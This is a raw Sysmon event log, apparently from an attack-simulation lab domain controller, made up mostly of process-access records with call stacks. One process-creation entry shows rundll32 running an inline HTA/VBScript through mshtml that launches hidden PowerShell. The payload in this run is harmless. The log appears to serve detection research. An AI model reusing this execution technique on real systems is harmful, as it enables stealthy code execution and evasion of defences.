15:59:40.194{7901BC46-4987-6008-1000-00000000A301}11601836C:\Windows\system32\svchost.exe{7901BC46-536B-6008-6E06-00000000A301}7492C:\Windows\System32\rundll32.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6624|c:\windows\system32\fntcache.dll+17aaf|c:\windows\system32\fntcache.dll+1a677|c:\windows\system32\fntcache.dll+1aaac|c:\windows\system32\fntcache.dll+502ee|c:\windows\system32\fntcache.dll+4fff2|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000026922Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:40.194{7901BC46-4987-6008-1000-00000000A301}11601836C:\Windows\system32\svchost.exe{7901BC46-536B-6008-6E06-00000000A301}7492C:\Windows\System32\rundll32.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6624|c:\windows\system32\fntcache.dll+17aaf|c:\windows\system32\fntcache.dll+1a677|c:\windows\system32\fntcache.dll+1aaac|c:\windows\system32\fntcache.dll+502ee|c:\windows\system32\fntcache.dll+4fff2|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000026921Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:40.194{7901BC46-4987-6008-1000-00000000A301}11601836C:\Windows\system32\svchost.exe{7901BC46-536B-6008-6E06-00000000A301}7492C:\Windows\System32\rundll32.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6624|c:\windows\system32\fntcache.dll+17aaf|c:\windows\system32\fntcache.dll+1a677|c:\windows\system32\fntcache.dll+1aaac|c:\windows\system32\fntcache.dll+502ee|c:\windows\system32\fntcache.dll+4fff2|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000027143Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:41.991{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-0D00-00000000A301}996C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000027142Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:41.991{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4986-6008-0C00-00000000A301}608C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000027141Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:41.991{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4985-6008-0B00-00000000A301}856C:\Windows\system32\lsass.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000027140Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:41.991{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4984-6008-0900-00000000A301}796C:\Windows\system32\winlogon.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000027139Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:41.538{7901BC46-4987-6008-1000-00000000A301}11601836C:\Windows\system32\svchost.exe{7901BC46-536C-6008-7106-00000000A301}4112C:\Windows\System32\rundll32.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6624|c:\windows\system32\fntcache.dll+17aaf|c:\windows\system32\fntcache.dll+1a677|c:\windows\system32\fntcache.dll+1aaac|c:\windows\system32\fntcache.dll+502ee|c:\windows\system32\fntcache.dll+4fff2|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000027138Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:41.538{7901BC46-4987-6008-1000-00000000A301}11601836C:\Windows\system32\svchost.exe{7901BC46-536C-6008-7106-00000000A301}4112C:\Windows\System32\rundll32.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6624|c:\windows\system32\fntcache.dll+17aaf|c:\windows\system32\fntcache.dll+1a677|c:\windows\system32\fntcache.dll+1aaac|c:\windows\system32\fntcache.dll+502ee|c:\windows\system32\fntcache.dll+4fff2|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000027137Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:41.538{7901BC46-4987-6008-1000-00000000A301}11601836C:\Windows\system32\svchost.exe{7901BC46-536C-6008-7106-00000000A301}4112C:\Windows\System32\rundll32.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6624|c:\windows\system32\fntcache.dll+17aaf|c:\windows\system32\fntcache.dll+1a677|c:\windows\system32\fntcache.dll+1aaac|c:\windows\system32\fntcache.dll+502ee|c:\windows\system32\fntcache.dll+4fff2|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000027136Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:41.209{7901BC46-4987-6008-1600-00000000A301}15362116C:\Windows\system32\svchost.exe{7901BC46-536D-6008-7206-00000000A301}8176C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000027135Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:41.209{7901BC46-4987-6008-1600-00000000A301}15361576C:\Windows\system32\svchost.exe{7901BC46-536D-6008-7206-00000000A301}8176C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5a94|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000027134Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:41.178{7901BC46-4985-6008-0B00-00000000A301}85696C:\Windows\system32\lsass.exe{7901BC46-536D-6008-7206-00000000A301}8176C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+25d17|C:\Windows\system32\lsasrv.dll+26ded|C:\Windows\system32\lsasrv.dll+25b95|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000027133Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:41.163{7901BC46-4985-6008-0B00-00000000A301}85696C:\Windows\system32\lsass.exe{7901BC46-536D-6008-7206-00000000A301}8176C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\system32\lsasrv.dll+25add|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 11241100x800000000000000027132Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:41.131{7901BC46-536D-6008-7206-00000000A301}8176C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\__PSScriptPolicyTest_ck4qh5zv.osu.ps12021-01-20 15:59:41.131 10341000x800000000000000027131Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:41.116{7901BC46-4986-6008-0C00-00000000A301}608724C:\Windows\system32\svchost.exe{7901BC46-536D-6008-7206-00000000A301}8176C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000027130Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:41.084{7901BC46-4987-6008-1600-00000000A301}15362116C:\Windows\system32\svchost.exe{7901BC46-536D-6008-7306-00000000A301}7972C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000027129Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:41.084{7901BC46-4987-6008-1600-00000000A301}15361576C:\Windows\system32\svchost.exe{7901BC46-536D-6008-7306-00000000A301}7972C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5a94|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000027128Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:41.069{7901BC46-536D-6008-7306-00000000A301}79727480C:\Windows\system32\conhost.exe{7901BC46-536D-6008-7206-00000000A301}8176C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000027127Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:41.069{7901BC46-4A88-6008-F200-00000000A301}19126716C:\Windows\system32\csrss.exe{7901BC46-536D-6008-7306-00000000A301}7972C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000027126Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:41.069{7901BC46-4986-6008-0C00-00000000A301}608724C:\Windows\system32\svchost.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000027125Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:41.069{7901BC46-4986-6008-0C00-00000000A301}608724C:\Windows\system32\svchost.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000027124Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:41.069{7901BC46-4986-6008-0C00-00000000A301}608724C:\Windows\system32\svchost.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000027123Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:41.069{7901BC46-4986-6008-0C00-00000000A301}608724C:\Windows\system32\svchost.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000027122Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:41.069{7901BC46-4A88-6008-F200-00000000A301}19122148C:\Windows\system32\csrss.exe{7901BC46-536D-6008-7206-00000000A301}8176C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000027121Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:41.053{7901BC46-536C-6008-7106-00000000A301}41124136C:\Windows\System32\rundll32.exe{7901BC46-536D-6008-7206-00000000A301}8176C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+16e55f|C:\Windows\System32\windows.storage.dll+16e1d5|C:\Windows\System32\windows.storage.dll+16dcc6|C:\Windows\System32\windows.storage.dll+16f138|C:\Windows\System32\windows.storage.dll+16daee|C:\Windows\System32\windows.storage.dll+fd005|C:\Windows\System32\windows.storage.dll+fd384|C:\Windows\System32\windows.storage.dll+fc9c0|C:\Windows\System32\shell32.dll+8d42f|C:\Windows\System32\shell32.dll+8d2bc|C:\Windows\System32\shell32.dll+8d00c|C:\Windows\System32\shell32.dll+114fd7|C:\Windows\System32\shell32.dll+114f35|C:\Windows\System32\wshom.ocx+c10d|C:\Windows\System32\wshom.ocx+be11|C:\Windows\System32\OLEAUT32.dll+2306f|C:\Windows\System32\OLEAUT32.dll+c2e5|C:\Windows\System32\OLEAUT32.dll+c836|C:\Windows\System32\OLEAUT32.dll+ce27|C:\Windows\System32\OLEAUT32.dll+ce27 154100x800000000000000027120Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:41.068{7901BC46-536D-6008-7206-00000000A301}8176C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe10.0.14393.206 (rs1_release.160915-0644)Windows PowerShellMicrosoft® Windows® Operating SystemMicrosoft CorporationPowerShell.EXE"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -nop -Command Write-Host aaaaaaaa-aaaa-aaaa-aaaa-aaaaaaaaaaaa; Start-Sleep -Seconds 2; exitC:\Windows\system32\ATTACKRANGE\Administrator{7901BC46-4A89-6008-6879-0C0000000000}0xc79682HighMD5=097CE5761C89434367598B34FE32893B,SHA256=BA4038FD20E474C047BE8AAD5BFACDB1BFC1DDBE12F803F473B7918D8D819436,IMPHASH=CAEE994F79D85E47C06E5FA9CDEAE453{7901BC46-536C-6008-7106-00000000A301}4112C:\Windows\System32\rundll32.exe"C:\Windows\System32\rundll32.exe" about:"\..\mshtml,RunHTMLApplication "%3Chta:application%3E%3Cscript%20language="VBScript"%3EClose(Execute("CreateObject(""Wscript.Shell"").Run%20""powershell.exe%20-nop%20-Command%20Write-Host%20aaaaaaaa-aaaa-aaaa-aaaa-aaaaaaaaaaaa;%20Start-Sleep%20-Seconds%202;%20exit"",0,true"))%3C/script%3E 10341000x800000000000000027119Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:41.038{7901BC46-4A8C-6008-0601-00000000A301}25005936C:\Windows\Explorer.EXE{7901BC46-536C-6008-7106-00000000A301}4112C:\Windows\System32\rundll32.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+b090f|C:\Windows\System32\SHELL32.dll+b14b5|C:\Windows\Explorer.EXE+1e03a|C:\Windows\Explorer.EXE+1e249|C:\Windows\Explorer.EXE+1df79|C:\Windows\Explorer.EXE+3c407|C:\Windows\System32\windows.storage.dll+13bc8f|C:\Windows\System32\windows.storage.dll+13aa1b|C:\Windows\System32\windows.storage.dll+138f3f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000027118Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:41.038{7901BC46-4A8C-6008-0601-00000000A301}25005936C:\Windows\Explorer.EXE{7901BC46-536C-6008-7106-00000000A301}4112C:\Windows\System32\rundll32.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+b13ce|C:\Windows\Explorer.EXE+1e03a|C:\Windows\Explorer.EXE+1e249|C:\Windows\Explorer.EXE+1df79|C:\Windows\Explorer.EXE+3c407|C:\Windows\System32\windows.storage.dll+13bc8f|C:\Windows\System32\windows.storage.dll+13aa1b|C:\Windows\System32\windows.storage.dll+138f3f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000027117Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:41.038{7901BC46-4A8C-6008-0601-00000000A301}25005936C:\Windows\Explorer.EXE{7901BC46-536C-6008-7106-00000000A301}4112C:\Windows\System32\rundll32.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+b0294|C:\Windows\System32\SHELL32.dll+b1397|C:\Windows\Explorer.EXE+1e03a|C:\Windows\Explorer.EXE+1e249|C:\Windows\Explorer.EXE+1df79|C:\Windows\Explorer.EXE+3c407|C:\Windows\System32\windows.storage.dll+13bc8f|C:\Windows\System32\windows.storage.dll+13aa1b|C:\Windows\System32\windows.storage.dll+138f3f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000027116Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 